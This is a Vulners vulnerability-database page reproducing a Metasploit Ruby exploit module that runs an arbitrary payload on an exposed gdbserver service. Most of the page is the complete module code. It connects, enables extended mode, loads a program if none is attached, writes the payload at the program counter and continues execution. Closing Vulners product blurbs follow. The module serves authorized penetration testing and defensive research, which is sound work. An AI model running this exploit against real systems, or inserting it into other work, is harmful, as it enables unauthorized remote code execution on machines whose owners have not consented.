Lucene search
K

GDB Server Remote Payload Execution

🗓️ 24 Aug 2014 06:10:30Reported by joev <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

GDB Server Remote Payload Execution module attempts to execute an arbitrary payload on a gdbserver service

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Gdb

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GDB Server Remote Payload Execution',
        'Description' => %q{
          This module attempts to execute an arbitrary payload on a loose gdbserver service.
        },
        'Author' => [ 'joev' ],
        'Targets' => [
          [ 'x86', { 'Arch' => ARCH_X86 } ],
          [ 'x86_64', { 'Arch' => ARCH_X64 } ],
          [ 'ARMLE', { 'Arch' => ARCH_ARMLE } ],
          [ 'AARCH64', { 'Arch' => ARCH_AARCH64 } ],
        ],
        'References' => [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
        ],
        'DisclosureDate' => '2014-08-24',
        'Platform' => %w[linux unix osx],
        'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
        'Notes' => {
          'SideEffects' => [IOC_IN_LOGS],
          'Stability' => [CRASH_SERVICE_DOWN, SERVICE_RESOURCE_LOSS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PrependFork' => true
        }
      )
    )

    register_options([
      OptString.new('EXE_FILE', [
        false,
        'The exe to spawn when gdbserver is not attached to a process.',
        '/bin/true'
      ])
    ])
  end

  def exploit
    connect

    print_status('Performing handshake with gdbserver...')
    handshake

    res = enable_extended_mode
    if res !~ /OK/
      fail_with(Failure::UnexpectedReply, 'Could not enable extended mode.')
    end

    begin
      print_status('Stepping program to find PC...')
      gdb_data = process_info
    rescue BadAckError, BadResponseError
      # gdbserver is running with the --multi flag and is not currently
      # attached to any process. let's attach to /bin/true or something.
      print_status("No process loaded, attempting to load #{datastore['EXE_FILE']}...")
      res = run_file(datastore['EXE_FILE'])
      if res !~ /OK/
        fail_with(Failure::UnexpectedReply, 'Could not load new program.')
      end
      gdb_data = process_info
    end

    gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)

    unless payload.arch.include?(gdb_arch)
      fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
    end

    print_status("Writing payload at #{gdb_pc}...")
    write(payload.encoded, gdb_pc)

    print_status('Executing the payload...')
    continue({read: false})
  ensure
    disconnect if sock
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation